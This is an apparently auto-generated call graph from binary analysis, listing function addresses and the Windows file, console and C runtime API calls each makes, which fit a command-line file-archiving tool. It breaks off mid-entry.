ad76d6 SetFilePointer GetLastError 73456->73464 73458->73437 73459 ad7796 SetLastError 73459->73458 73460->73441 73461->73437 73462->73434 73463->73451 73464->73459 73466 b1ae86 73465->73466 73477 ae7190 73466->73477 73490 ae7140 73466->73490 73467 b1aebb 73467->73421 73471 b1af36 73470->73471 73473 b1b010 73471->73473 73475 b1aeeb 107 API calls 73471->73475 73582 adbd0c 73471->73582 73587 b1ad3a 73471->73587 73591 b1aebf 107 API calls 73471->73591 73473->73421 73475->73471 73478 ae719a __EH_prolog 73477->73478 73479 ae71b0 73478->73479 73483 ae71dd 73478->73483 73520 ae4d78 73479->73520 73481 ae71b7 73481->73467 73494 ae6fc5 73483->73494 73484 ae72b4 73485 ae4d78 VariantClear 73484->73485 73486 ae72c0 73484->73486 73485->73486 73486->73481 73487 ae7140 7 API calls 73486->73487 73487->73481 73488 ae72a3 SetFileSecurityW 73488->73484 73489 ae7236 73489->73481 73489->73484 73489->73488 73491 ae718d 73490->73491 73492 ae714b 73490->73492 73491->73467 73492->73491 73581 ae4dff 7 API calls 2 library calls 73492->73581 73495 ae6fcf __EH_prolog 73494->73495 73523 ae44a6 73495->73523 73502 ae706a 73526 ae68ac 73502->73526 73503 ae7029 73503->73502 73545 ae4dff 7 API calls 2 library calls 73503->73545 73504 ae709e 73550 ad1e40 free 73504->73550 73505 ae7051 73505->73502 73508 ae11b4 107 API calls 73505->73508 73507 ae70c0 73546 ad6096 15 API calls 2 library calls 73507->73546 73508->73502 73509 ae712e 73509->73489 73511 ae70d1 73512 ae70e2 73511->73512 73547 ae4dff 7 API calls 2 library calls 73511->73547 73517 ae70e6 73512->73517 73548 ae6b5e 69 API calls 2 library calls 73512->73548 73515 ae70fd 73516 ae7103 73515->73516 73515->73517 73549 ad1e40 free 73516->73549 73517->73504 73519 ae710b 73519->73509 73570 af9262 73520->73570 73551 ad2e04 73523->73551 73527 ae68b6 __EH_prolog 73526->73527 73528 ae6921 73527->73528 73543 ae68c5 73527->73543 73555 ad7d4b 73527->73555 73530 ae6998 73528->73530 73538 ae6962 73528->73538 73561 ae6a17 6 API calls 2 library calls 73528->73561 73532 ae69e1 73530->73532 73554 ad7c3b SetFileTime 73530->73554 73565 adbcf8 CloseHandle 73532->73565 73534 ae697a 73563 ae6b09 13 API calls __EH_prolog 73534->73563 73538->73530 73562 ad2dcd malloc _CxxThrowException 73538->73562 73541 ae698c 73564 ad1e40 free 73541->73564 73543->73504 73543->73507 73544 ae6e71 12 API calls 2 library calls 73544->73503 73545->73505 73546->73511 73547->73512 73548->73515 73549->73519 73550->73509 73552 ad1e0c ctype 2 API calls 73551->73552 73553 ad2e11 73552->73553 73553->73502 73553->73503 73553->73544 73554->73532 73566 ad77c8 73555->73566 73557 ad7d76 73557->73528 73560 ae4dff 7 API calls 2 library calls 73557->73560 73560->73528 73561->73538 73562->73534 73563->73541 73564->73530 73565->73543 73567 ad7731 SetFilePointer GetLastError SetFilePointer GetLastError SetLastError 73566->73567 73568 ad77db 73567->73568 73568->73557 73569 ad7d3c SetEndOfFile 73568->73569 73569->73557 73571 af926c __EH_prolog 73570->73571 73572 af92fc 73571->73572 73574 af92a4 73571->73574 73573 ad965d VariantClear 73572->73573 73576 ae4d91 73573->73576 73577 ad965d 73574->73577 73576->73481 73578 ad9685 73577->73578 73580 ad9665 73577->73580 73578->73576 73579 ad967e VariantClear 73579->73578 73580->73578 73580->73579 73581->73491 73592 ad7ca2 73582->73592 73586 adbd3d 73586->73471 73588 b1ad44 __EH_prolog 73587->73588 73600 ae6305 73588->73600 73589 b1adbf 73589->73471 73591->73471 73594 ad7caf 73592->73594 73595 ad7cdb 73594->73595 73597 ad7c68 73594->73597 73595->73586 73596 adb8ec GetLastError 73595->73596 73596->73586 73598 ad7c79 WriteFile 73597->73598 73599 ad7c76 73597->73599 73598->73594 73599->73598 73601 ae630f __EH_prolog 73600->73601 73637 ae62b9 73601->73637 73604 ae6427 73606 ad965d VariantClear 73604->73606 73605 ae644a 73607 ad965d VariantClear 73605->73607 73629 ae6445 73606->73629 73608 ae646b 73607->73608 73641 ae5126 73608->73641 73613 ae4d78 VariantClear 73614 ae6499 73613->73614 73614->73629 73630 ae64ca 73614->73630 73797 ae5110 9 API calls 73614->73797 73616 ae65de 73617 ae669e 73616->73617 73618 ae65e7 73616->73618 73624 ae66b8 73617->73624 73625 ae6754 73617->73625 73617->73629 73622 ad1e0c ctype 2 API calls 73618->73622 73623 ae65f6 73618->73623 73619 ae64da 73619->73616 73619->73629 73799 ae789c free memmove ctype 73619->73799 73622->73623 73800 af36ea 73623->73800 73628 ad1e0c ctype 2 API calls 73624->73628 73687 ae5bea 73625->73687 73627 ae666b 73813 ad1e40 free 73627->73813 73628->73629 73629->73589 73630->73619 73630->73629 73798 ad42e3 CharUpperW 73630->73798 73631 ae665c 73812 ad31e5 malloc _CxxThrowException free _CxxThrowException 73631->73812 73638 ae62c9 73637->73638 73814 af8fa4 73638->73814 73642 ae5130 __EH_prolog 73641->73642 73643 ae51b4 73642->73643 73649 ae518e 73642->73649 73868 ad3097 malloc _CxxThrowException free SysStringLen ctype 73642->73868 73646 ad965d VariantClear 73643->73646 73643->73649 73645 ad965d VariantClear 73647 ae527f 73645->73647 73648 ae51bc 73646->73648 73647->73629 73683 af8b05 73647->73683 73648->73649 73650 ae5289 73648->73650 73651 ae5206 73648->73651 73649->73645 73650->73649 73652 ae5221 73650->73652 73869 ad3097 malloc _CxxThrowException free SysStringLen ctype 73651->73869 73654 ad965d VariantClear 73652->73654 73655 ae522d 73654->73655 73655->73647 73656 ae5351 73655->73656 73870 ae5459 malloc _CxxThrowException __EH_prolog 73655->73870 73656->73647 73663 ae53a1 73656->73663 73875 ad35e7 memmove 73656->73875 73659 ae52ba 73871 ad8011 5 API calls ctype 73659->73871 73661 ae52cf 73674 ae52fd 73661->73674 73872 ad823d 10 API calls 2 library calls 73661->73872 73663->73647 73876 ad43b7 5 API calls 2 library calls 73663->73876 73666 ae52e5 73667 ad2fec 3 API calls 73666->73667 73669 ae52f5 73667->73669 73668 ae540e 73878 ae789c free memmove ctype 73668->73878 73873 ad1e40 free 73669->73873 73673 ae53df 73673->73668 73675 ae541c 73673->73675 73877 ad42e3 CharUpperW 73673->73877 73874 ae54a0 free ctype 73674->73874 73676 af36ea 5 API calls 73675->73676 73677 ae5427 73676->73677 73678 ad2fec 3 API calls 73677->73678 73679 ae5433 73678->73679 73879 ad1e40 free 73679->73879 73681 ae543b 73880 b02db9 free ctype 73681->73880 73684 af8b2e 73683->73684 73685 ad965d VariantClear 73684->73685 73686 ae648a 73685->73686 73686->73613 73686->73629 73688 ae5bf4 __EH_prolog 73687->73688 73881 ae54c0 73688->73881 73691 ae5e17 73691->73629 73692 af8b05 VariantClear 73693 ae5c34 73692->73693 73693->73691 73896 ae5630 73693->73896 73696 af36ea 5 API calls 73697 ae5c51 73696->73697 73698 ae5c60 73697->73698 73999 ae57c1 53 API calls 2 library calls 73697->73999 73917 ad2f1c 73698->73917 73797->73630 73798->73630 73799->73616 73801 af36f4 __EH_prolog 73800->73801 73802 ad2e04 2 API calls 73801->73802 73803 af370a 73802->73803 73804 af3736 73803->73804 74188 ad1089 malloc _CxxThrowException free _CxxThrowException 73803->74188 74189 ad31e5 malloc _CxxThrowException free _CxxThrowException 73803->74189 73805 ad2f1c 2 API calls 73804->73805 73808 af3742 73805->73808 74187 ad1e40 free 73808->74187 73810 ae6633 73810->73627 73810->73631 73811 ad1089 malloc _CxxThrowException free _CxxThrowException 73810->73811 73811->73631 73812->73627 73813->73629 73815 af8fae __EH_prolog 73814->73815 73848 af7ebb 73815->73848 73821 af9020 73822 ad2fec 3 API calls 73821->73822 73830 ae6302 73821->73830 73823 af903a 73822->73823 73834 af904d 73823->73834 73856 af8b80 VariantClear 73823->73856 73825 af9144 73835 af917b 73825->73835 73859 ad2f88 73825->73859 73826 af9244 73867 ad43b7 5 API calls 2 library calls 73826->73867 73827 af91b0 73865 af8b9c 10 API calls 2 library calls 73827->73865 73830->73604 73830->73605 73830->73629 73832 af9100 73836 ad965d VariantClear 73832->73836 73833 af90d6 73833->73832 73839 af90e7 73833->73839 73858 af8f2e 9 API calls 73833->73858 73834->73825 73834->73830 73834->73832 73834->73833 73857 ad3097 malloc _CxxThrowException free SysStringLen ctype 73834->73857 73835->73826 73835->73827 73836->73830 73837 af91c0 73837->73830 73841 ad2f88 3 API calls 73837->73841 73843 ad965d VariantClear 73839->73843 73846 af91ff 73841->73846 73842 af9112 73842->73832 73844 af8b64 VariantClear 73842->73844 73843->73825 73845 af9123 73844->73845 73845->73832 73845->73839 73846->73830 73866 ad50ff free ctype 73846->73866 73850 af7ee4 73848->73850 73851 af7ec6 73848->73851 73849 ad1e40 free ctype 73849->73851 73852 af8b64 73850->73852 73851->73849 73851->73850 73853 af8b05 VariantClear 73852->73853 73854 af8b6f 73853->73854 73854->73830 73855 af8f2e 9 API calls 73854->73855 73855->73821 73856->73834 73857->73833 73858->73842 73860 ad2f9a 73859->73860 73861 ad2fbe 73860->73861 73862 ad1e0c ctype malloc _CxxThrowException 73860->73862 73861->73835 73863 ad2fb4 73862->73863 73864 ad1e40 ctype free 73863->73864 73864->73861 73865->73837 73866->73830 73867->73830 73868->73643 73869->73652 73870->73659 73871->73661 73872->73666 73873->73674 73874->73656 73875->73656 73876->73673 73877->73673 73878->73675 73879->73681 73880->73647 73882 ae54ca __EH_prolog 73881->73882 73883 ad965d VariantClear 73882->73883 73886 ae5507 73882->73886 73887 ae5528 73883->73887 73884 ad965d VariantClear 73885 ae5567 73884->73885 73885->73691 73885->73692 73886->73884 73887->73886 73888 ae5572 73887->73888 73889 ad965d VariantClear 73888->73889 73890 ae558e 73889->73890 74030 ae4cac VariantClear __EH_prolog 73890->74030 73892 ae55a1 73892->73885 74031 ae4cac VariantClear __EH_prolog 73892->74031 73894 ae55b8 73894->73885 74032 ae4cac VariantClear __EH_prolog 73894->74032 73898 ae563a __EH_prolog 73896->73898 73899 ae5679 73898->73899 74033 af3558 10 API calls 2 library calls 73898->74033 73900 ad2f1c 2 API calls 73899->73900 73916 ae571a 73899->73916 73901 ae5696 73900->73901 74034 af3333 malloc _CxxThrowException free 73901->74034 73903 ae56a2 73904 ae56ad 73903->73904 73905 ae56c5 73903->73905 74035 ae7853 5 API calls 2 library calls 73904->74035 73907 ae56b4 73905->73907 74036 ad4adf wcscmp 73905->74036 73909 ae5707 73907->73909 74038 ad1089 malloc _CxxThrowException free _CxxThrowException 73907->74038 74039 ad31e5 malloc _CxxThrowException free _CxxThrowException 73909->74039 73910 ae56d2 73910->73907 74037 ae7853 5 API calls 2 library calls 73910->74037 73916->73696 74041 ad2ba6 73917->74041 73999->73698 74030->73892 74031->73894 74032->73885 74033->73899 74034->73903 74035->73907 74036->73910 74037->73907 74038->73909 74042 ad1e0c ctype malloc _CxxThrowException 74041->74042 74043 ad2bbb 74042->74043 74187->73810 74188->73803 74189->73803 74190 b0adb7 74191 b0adc1 __EH_prolog 74190->74191 74206 ad26dd 74191->74206 74193 b0ae1d 74194 ad2e04 2 API calls 74193->74194 74195 b0ae38 74194->74195 74196 ad2e04 2 API calls 74195->74196 74197 b0ae44 74196->74197 74198 ad2e04 2 API calls 74197->74198 74199 b0ae68 74198->74199 74209 b0ad29 74199->74209 74203 b0ae94 74204 ad2e04 2 API calls 74203->74204 74205 b0aeb2 74204->74205 74207 ad1e0c ctype 2 API calls 74206->74207 74208 ad26ea 74207->74208 74208->74193 74210 b0ad33 __EH_prolog 74209->74210 74211 ad2e04 2 API calls 74210->74211 74212 b0ad5f 74211->74212 74213 ad2e04 2 API calls 74212->74213 74214 b0ad72 74213->74214 74215 b0af2d 74214->74215 74216 b0af37 __EH_prolog 74215->74216 74227 ae34f4 malloc _CxxThrowException __EH_prolog 74216->74227 74218 b0afac 74219 ad2e04 2 API calls 74218->74219 74220 b0afbb 74219->74220 74221 ad2e04 2 API calls 74220->74221 74222 b0afca 74221->74222 74223 ad2e04 2 API calls 74222->74223 74224 b0afd9 74223->74224 74225 ad2e04 2 API calls 74224->74225 74226 b0afe8 74225->74226 74226->74203 74227->74218 74228 b6ffb1 __setusermatherr 74229 b6ffbd 74228->74229 74234 b70068 _controlfp 74229->74234 74231 b6ffc2 _initterm __getmainargs _initterm __p___initenv 74232 b0c27c 74231->74232 74233 b7001d exit _XcptFilter 74232->74233 74234->74231 74235 b0993d 74319 b0b5b1 74235->74319 74238 b09963 74325 ae1f33 74238->74325 74241 b09975 74242 b099ce 74241->74242 74243 b099b7 GetStdHandle GetConsoleScreenBufferInfo 74241->74243 74244 ad1e0c ctype 2 API calls 74242->74244 74243->74242 74245 b099dc 74244->74245 74446 af7b48 74245->74446 74247 b09a29 74475 b0b96d _CxxThrowException 74247->74475 74249 b09a30 74476 af7018 8 API calls 2 library calls 74249->74476 74251 b09a7c 74477 afddb5 6 API calls 2 library calls 74251->74477 74253 b09a66 _CxxThrowException 74253->74251 74254 b09aa6 74255 b09aaa _CxxThrowException 74254->74255 74265 b09ac0 74254->74265 74255->74265 74256 b09a37 74256->74251 74256->74253 74257 b09b3a 74481 ad1fa0 fputc 74257->74481 74260 b09bfa _CxxThrowException 74315 b09be6 74260->74315 74261 b09b63 fputs 74482 ad1fa0 fputc 74261->74482 74264 b09b79 strlen strlen 74266 b09e25 74264->74266 74267 b09baa fputs fputc 74264->74267 74265->74257 74265->74260 74478 af7dd7 7 API calls 2 library calls 74265->74478 74479 b0c077 6 API calls 74265->74479 74480 ad1e40 free 74265->74480 74490 ad1fa0 fputc 74266->74490 74267->74315 74270 b09e2c fputs 74491 ad1fa0 fputc 74270->74491 74272 b09f0c 74496 ad1fa0 fputc 74272->74496 74275 b0b67d 12 API calls 74275->74315 74276 b09f13 fputs 74497 ad1fa0 fputc 74276->74497 74280 b09f9f 74282 b0ac3a 74280->74282 74283 b0ac35 74280->74283 74281 ad2e04 2 API calls 74281->74315 74292 ad31e5 malloc _CxxThrowException free _CxxThrowException 74292->74315 74294 b09f29 74294->74280 74306 b09f77 fputs 74294->74306 74498 b0b650 fputc fputs fputs fputc 74294->74498 74499 b0b5e9 fputc fputs 74294->74499 74500 b0bde4 fputc fputs 74294->74500 74297 b09d2a fputs 74487 ad21d8 fputs 74297->74487 74303 b09d5f fputs 74303->74315 74305 b09e42 74305->74272 74312 b09ee0 fputs 74305->74312 74492 b0b650 fputc fputs fputs fputc 74305->74492 74493 ad21d8 fputs 74305->74493 74494 b0bde4 fputc fputs 74305->74494 74501 ad1fa0 fputc 74306->74501 74495 ad1fa0 fputc 74312->74495 74315->74266 74315->74267 74315->74275 74315->74281 74315->74292 74315->74297 74315->74303 74483 ad21d8 fputs 74315->74483 74484 ad315e malloc _CxxThrowException free _CxxThrowException 74315->74484 74485 ad3221 malloc _CxxThrowException free _CxxThrowException 74315->74485 74486 ad1089 malloc _CxxThrowException free _CxxThrowException 74315->74486 74488 ad1fa0 fputc 74315->74488 74489 ad1e40 free 74315->74489 74320 b0994a 74319->74320 74321 b0b5bc fputs 74319->74321 74320->74238 74463 ad1fb3 74320->74463 74515 ad1fa0 fputc 74321->74515 74323 b0b5d5 74323->74320 74324 b0b5d9 fputs 74323->74324 74324->74320 74326 ae1f4f 74325->74326 74327 ae1f6c 74325->74327 74558 af1d73 5 API calls __EH_prolog 74326->74558 74516 ae29eb 74327->74516 74331 ae1f5e _CxxThrowException 74331->74327 74332 ae1fa3 74334 ae1fbc 74332->74334 74336 ad4fc0 5 API calls 74332->74336 74337 ae1fda 74334->74337 74338 ad2fec 3 API calls 74334->74338 74335 ae1f95 _CxxThrowException 74335->74332 74336->74334 74339 ae2022 wcscmp 74337->74339 74347 ae2036 74337->74347 74338->74337 74340 ae20af 74339->74340 74339->74347 74560 af1d73 5 API calls __EH_prolog 74340->74560 74342 ae20a9 74561 ae393c 6 API calls 2 library calls 74342->74561 74343 ae20be _CxxThrowException 74343->74347 74345 ae20f4 74562 ae393c 6 API calls 2 library calls 74345->74562 74347->74342 74351 ae219a 74347->74351 74348 ae2108 74349 ae2135 74348->74349 74563 ae2e04 62 API calls 2 library calls 74348->74563 74356 ae2159 74349->74356 74564 ae2e04 62 API calls 2 library calls 74349->74564 74565 af1d73 5 API calls __EH_prolog 74351->74565 74354 ae21a9 _CxxThrowException 74354->74356 74355 ae227f 74521 ae2aa9 74355->74521 74356->74355 74358 ae2245 74356->74358 74566 af1d73 5 API calls __EH_prolog 74356->74566 74359 ad2fec 3 API calls 74358->74359 74363 ae225c 74359->74363 74362 ae2237 _CxxThrowException 74362->74358 74363->74355 74567 af1d73 5 API calls __EH_prolog 74363->74567 74364 ae22d9 74366 ae2302 74364->74366 74369 ad2fec 3 API calls 74364->74369 74365 ad2fec 3 API calls 74365->74364 74539 ad4fc0 74366->74539 74369->74366 74371 ae2271 _CxxThrowException 74371->74355 74373 ae2322 74375 ae26c6 74373->74375 74380 ae23a1 74373->74380 74374 ae28ce 74376 ae293a 74374->74376 74388 ae28d5 74374->74388 74375->74374 74377 ae2700 74375->74377 74580 af1d73 5 API calls __EH_prolog 74375->74580 74381 ae293f 74376->74381 74382 ae29a5 74376->74382 74581 ae32ec 14 API calls 2 library calls 74377->74581 74391 ae247a wcscmp 74380->74391 74407 ae248e 74380->74407 74598 ad4eec 16 API calls 74381->74598 74384 ae29ae _CxxThrowException 74382->74384 74438 ae264d 74382->74438 74383 ae26f2 _CxxThrowException 74383->74377 74385 ae2713 74582 ae3a29 74385->74582 74388->74438 74597 af1d73 5 API calls __EH_prolog 74388->74597 74390 ae294c 74599 ad4ea1 8 API calls 74390->74599 74393 ae24cf wcscmp 74391->74393 74391->74407 74396 ae24ef wcscmp 74393->74396 74393->74407 74399 ae250f 74396->74399 74396->74407 74397 ae2953 74400 ad4fc0 5 API calls 74397->74400 74398 ae2920 _CxxThrowException 74398->74438 74571 af1d73 5 API calls __EH_prolog 74399->74571 74400->74438 74403 ae251e _CxxThrowException 74405 ae252c 74403->74405 74404 ae27cf 74408 ae2880 74404->74408 74413 ae281f 74404->74413 74593 af1d73 5 API calls __EH_prolog 74404->74593 74409 ae2569 74405->74409 74572 ae2e04 62 API calls 2 library calls 74405->74572 74406 ad2fec 3 API calls 74410 ae27a9 74406->74410 74407->74405 74568 ad4eec 16 API calls 74407->74568 74569 ad4ea1 8 API calls 74407->74569 74570 af1d73 5 API calls __EH_prolog 74407->74570 74411 ae289b 74408->74411 74418 ad2fec 3 API calls 74408->74418 74415 ae258c 74409->74415 74573 ae2e04 62 API calls 2 library calls 74409->74573 74410->74404 74592 ad3563 memmove 74410->74592 74411->74438 74596 af1d73 5 API calls __EH_prolog 74411->74596 74413->74408 74422 ae2847 74413->74422 74594 af1d73 5 API calls __EH_prolog 74413->74594 74420 ae25a4 74415->74420 74574 ae2a61 malloc _CxxThrowException free _CxxThrowException memcpy 74415->74574 74416 ae24c1 _CxxThrowException 74416->74393 74418->74411 74575 ad4eec 16 API calls 74420->74575 74421 ae2811 _CxxThrowException 74421->74413 74422->74408 74595 af1d73 5 API calls __EH_prolog 74422->74595 74428 ae2839 _CxxThrowException 74428->74422 74430 ae25ad 74576 af1b07 49 API calls 74430->74576 74431 ae28c0 _CxxThrowException 74431->74374 74432 ae2872 _CxxThrowException 74432->74408 74434 ae25b4 74577 ad4ea1 8 API calls 74434->74577 74436 ae25bb 74437 ad2fec 3 API calls 74436->74437 74440 ae25d6 74436->74440 74437->74440 74438->74241 74439 ae261f 74439->74438 74442 ad2fec 3 API calls 74439->74442 74440->74438 74440->74439 74578 af1d73 5 API calls __EH_prolog 74440->74578 74444 ae263f 74442->74444 74443 ae2611 _CxxThrowException 74443->74439 74579 ad859e malloc _CxxThrowException free _CxxThrowException 74444->74579 74447 af7b52 __EH_prolog 74446->74447 74625 af7eec 74447->74625 74449 af7ca4 74449->74247 74451 ad2e04 malloc _CxxThrowException 74458 af7b63 74451->74458 74452 ad30ea malloc _CxxThrowException free 74452->74458 74454 ad1e40 free ctype 74454->74458 74457 b104d2 5 API calls 74457->74458 74458->74449 74458->74451 74458->74452 74458->74454 74458->74457 74460 ad429a 3 API calls 74458->74460 74462 af7c61 memcpy 74458->74462 74630 af70ea 74458->74630 74633 af7a40 74458->74633 74651 af7cc3 6 API calls 74458->74651 74652 ae12a5 74458->74652 74657 af74eb malloc _CxxThrowException memcpy __EH_prolog ctype 74458->74657 74658 af7193 74458->74658 74460->74458 74462->74458 74464 ad1fbd __EH_prolog 74463->74464 74465 ad26dd 2 API calls 74464->74465 74466 ad1fcb 74465->74466 74675 ad2e47 74466->74675 74470 ad1fed 74682 ad1e40 free 74470->74682 74472 ad1ff5 74683 ad1e40 free 74472->74683 74474 ad1ffd 74474->74238 74475->74249 74476->74256 74477->74254 74478->74265 74479->74265 74480->74265 74481->74261 74482->74264 74483->74315 74484->74315 74485->74315 74486->74315 74487->74315 74488->74315 74489->74315 74490->74270 74491->74305 74492->74305 74493->74305 74494->74305 74495->74305 74496->74276 74497->74294 74498->74294 74499->74294 74500->74294 74501->74294 74515->74323 74517 ad2f1c 2 API calls 74516->74517 74518 ae29fe 74517->74518 74600 ad1e40 free 74518->74600 74520 ae1f7e 74520->74332 74559 af1d73 5 API calls __EH_prolog 74520->74559 74522 ae2ab3 __EH_prolog 74521->74522 74533 ae2b0f 74522->74533 74601 ad2e8a 74522->74601 74525 ae22ad 74525->74364 74525->74365 74527 ae2b04 74606 ad1e40 free 74527->74606 74528 ae2bc6 74611 af1d73 5 API calls __EH_prolog 74528->74611 74531 ae2bd6 _CxxThrowException 74531->74525 74533->74525 74533->74528 74536 ae2b9f 74533->74536 74607 ae2cb4 48 API calls 2 library calls 74533->74607 74608 ae2bf5 8 API calls __EH_prolog 74533->74608 74609 ae2a61 malloc _CxxThrowException free _CxxThrowException memcpy 74533->74609 74536->74525 74610 af1d73 5 API calls __EH_prolog 74536->74610 74538 ae2bb8 _CxxThrowException 74538->74528 74540 ad4fd2 74539->74540 74541 ad4fce 74539->74541 74542 af7ebb free 74540->74542 74549 ae384c 74541->74549 74543 ad4fd9 74542->74543 74544 ad5006 74543->74544 74545 ad4ffe 74543->74545 74546 ad4fe9 _CxxThrowException 74543->74546 74544->74541 74613 ad1524 malloc _CxxThrowException __EH_prolog ctype 74544->74613 74612 b10551 malloc _CxxThrowException free memcpy ctype 74545->74612 74546->74545 74557 ae3856 __EH_prolog 74549->74557 74550 ae3917 74550->74373 74551 ad2e04 malloc _CxxThrowException 74551->74557 74552 ad2fec 3 API calls 74552->74557 74553 ad2f88 3 API calls 74553->74557 74556 ad1e40 free ctype 74556->74557 74557->74550 74557->74551 74557->74552 74557->74553 74557->74556 74614 b104d2 74557->74614 74620 ae3b76 malloc _CxxThrowException __EH_prolog ctype 74557->74620 74558->74331 74559->74335 74560->74343 74561->74345 74562->74348 74563->74349 74564->74356 74565->74354 74566->74362 74567->74371 74568->74407 74569->74407 74570->74416 74571->74403 74572->74409 74573->74415 74574->74420 74575->74430 74576->74434 74577->74436 74578->74443 74579->74438 74580->74383 74581->74385 74583 ae3a3b 74582->74583 74587 ae2722 74582->74587 74622 ae3bd9 free ctype 74583->74622 74585 ae3a6f 74585->74587 74624 ae3b76 malloc _CxxThrowException __EH_prolog ctype 74585->74624 74586 ae3a42 74586->74585 74588 ae3a67 74586->74588 74589 ae3a52 _CxxThrowException 74586->74589 74587->74404 74587->74406 74623 b10551 malloc _CxxThrowException free memcpy ctype 74588->74623 74589->74588 74592->74404 74593->74421 74594->74428 74595->74432 74596->74431 74597->74398 74598->74390 74599->74397 74600->74520 74602 ad2ea0 74601->74602 74603 ad2ba6 2 API calls 74602->74603 74604 ad2eaf 74603->74604 74605 ae2a61 malloc _CxxThrowException free _CxxThrowException memcpy 74604->74605 74605->74527 74606->74533 74607->74533 74608->74533 74609->74533 74610->74538 74611->74531 74612->74544 74613->74544 74615 b10513 74614->74615 74616 b104df 74614->74616 74615->74557 74617 b104e8 _CxxThrowException 74616->74617 74618 b104fd 74616->74618 74617->74618 74621 b10551 malloc _CxxThrowException free memcpy ctype 74618->74621 74620->74557 74621->74615 74622->74586 74623->74585 74624->74585 74626 af7f14 74625->74626 74628 af7ef7 74625->74628 74626->74458 74627 af7193 free 74627->74628 74628->74626 74628->74627 74666 ad1e40 free 74628->74666 74631 ad2e04 2 API calls 74630->74631 74632 af7103 74631->74632 74632->74458 74634 af7a4a __EH_prolog 74633->74634 74667 ad361b 6 API calls 2 library calls 74634->74667 74636 af7a78 74668 ad361b 6 API calls 2 library calls 74636->74668 74638 af7b20 74670 b02db9 free ctype 74638->74670 74640 ad2e04 malloc _CxxThrowException 74642 af7a83 74640->74642 74641 af7b2b 74671 b02db9 free ctype 74641->74671 74642->74638 74642->74640 74645 ad2fec 3 API calls 74642->74645 74646 ad2fec 3 API calls 74642->74646 74647 b104d2 5 API calls 74642->74647 74650 ad1e40 free ctype 74642->74650 74669 af7955 malloc _CxxThrowException __EH_prolog ctype 74642->74669 74644 af7b37 74644->74458 74645->74642 74648 af7aca wcscmp 74646->74648 74647->74642 74648->74642 74650->74642 74651->74458 74653 b104d2 5 API calls 74652->74653 74654 ae12ad 74653->74654 74655 ad1e0c ctype 2 API calls 74654->74655 74656 ae12b4 74655->74656 74656->74458 74657->74458 74659 af719d __EH_prolog 74658->74659 74672 b02db9 free ctype 74659->74672 74661 af71b3 74673 af71d5 free __EH_prolog ctype 74661->74673 74663 af71bf 74674 ad1e40 free 74663->74674 74665 af71c7 74665->74458 74666->74628 74667->74636 74668->74642 74669->74642 74670->74641 74671->74644 74672->74661 74673->74663 74674->74665 74676 ad2e57 74675->74676 74677 ad2ba6 2 API calls 74676->74677 74678 ad1fda 74677->74678 74679 ad2010 74678->74679 74680 ad2033 10 API calls 74679->74680 74681 ad2022 fputs 74680->74681 74681->74470 74682->74472 74683->74474 74686 ad7b20 74689 ad7ab2 74686->74689 74690 ad7ac5 74689->74690 74697 ad759a 74690->74697 74693 ad7b03 74711 ad7919 74693->74711 74694 ad7aeb SetFileTime 74694->74693 74698 ad75a4 __EH_prolog 74697->74698 74727 ad764c 74698->74727 74700 ad7632 74700->74693 74700->74694 74701 ad75af 74701->74700 74702 ad75e9 74701->74702 74703 ad75d4 CreateFileW 74701->74703 74702->74700 74704 ad2e04 2 API calls 74702->74704 74703->74702 74705 ad75fb 74704->74705 74730 ad8b4a 74705->74730 74707 ad7611 74708 ad762a 74707->74708 74709 ad7615 CreateFileW 74707->74709 74735 ad1e40 free 74708->74735 74709->74708 74712 ad7aac 74711->74712 74713 ad793c 74711->74713 74713->74712 74714 ad7945 DeviceIoControl 74713->74714 74715 ad7969 74714->74715 74716 ad79e6 74714->74716 74715->74716 74722 ad79a7 74715->74722 74717 ad79ef DeviceIoControl 74716->74717 74720 ad7a14 74716->74720 74718 ad7a22 DeviceIoControl 74717->74718 74717->74720 74719 ad7a44 DeviceIoControl 74718->74719 74718->74720 74719->74720 74720->74712 74854 ad780d 8 API calls ctype 74720->74854 74853 ad9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 74722->74853 74723 ad7aa5 74725 ad77de 5 API calls 74723->74725 74725->74712 74726 ad79d0 74726->74716 74728 ad7661 74727->74728 74729 ad7656 CloseHandle 74727->74729 74728->74701 74729->74728 74736 ad8b80 74730->74736 74732 ad8b6e 74732->74707 74734 ad2f88 3 API calls 74734->74732 74735->74700 74737 ad8b8a __EH_prolog 74736->74737 74738 ad8c7b 74737->74738 74744 ad8be1 74737->74744 74783 ad8b55 74737->74783 74739 ad8d23 74738->74739 74741 ad8c8f 74738->74741 74740 ad8e8a 74739->74740 74743 ad8d3b 74739->74743 74742 ad2e47 2 API calls 74740->74742 74741->74743 74749 ad8c9e 74741->74749 74745 ad8e96 74742->74745 74746 ad2e04 2 API calls 74743->74746 74747 ad2e47 2 API calls 74744->74747 74744->74783 74753 ad2e47 2 API calls 74745->74753 74748 ad8d43 74746->74748 74750 ad8c05 74747->74750 74833 ad6332 6 API calls 2 library calls 74748->74833 74752 ad2e47 2 API calls 74749->74752 74756 ad8c24 74750->74756 74757 ad8c17 74750->74757 74760 ad8ca7 74752->74760 74755 ad8eb8 74753->74755 74754 ad8d52 74817 ad8d56 74754->74817 74834 ad859e malloc _CxxThrowException free _CxxThrowException 74754->74834 74845 ad8f57 memmove 74755->74845 74763 ad2e47 2 API calls 74756->74763 74823 ad1e40 free 74757->74823 74765 ad2e47 2 API calls 74760->74765 74762 ad8ec4 74766 ad8ede 74762->74766 74767 ad8ec8 74762->74767 74768 ad8c35 74763->74768 74770 ad8cd0 74765->74770 74848 ad3221 malloc _CxxThrowException free _CxxThrowException 74766->74848 74846 ad1e40 free 74767->74846 74824 ad8f57 memmove 74768->74824 74828 ad8f57 memmove 74770->74828 74773 ad8eeb 74849 ad31e5 malloc _CxxThrowException free _CxxThrowException 74773->74849 74775 ad8ed0 74847 ad1e40 free 74775->74847 74776 ad8c41 74779 ad8c6b 74776->74779 74825 ad31e5 malloc _CxxThrowException free _CxxThrowException 74776->74825 74777 ad8cdc 74782 ad8d13 74777->74782 74829 ad3221 malloc _CxxThrowException free _CxxThrowException 74777->74829 74827 ad1e40 free 74779->74827 74832 ad1e40 free 74782->74832 74783->74732 74783->74734 74786 ad8f06 74850 ad31e5 malloc _CxxThrowException free _CxxThrowException 74786->74850 74787 ad8c73 74852 ad1e40 free 74787->74852 74789 ad2e04 2 API calls 74793 ad8ddf 74789->74793 74790 ad8c60 74826 ad31e5 malloc _CxxThrowException free _CxxThrowException 74790->74826 74792 ad8ced 74830 ad31e5 malloc _CxxThrowException free _CxxThrowException 74792->74830 74798 ad8e0e 74793->74798 74801 ad8df1 74793->74801 74795 ad8f11 74851 ad1e40 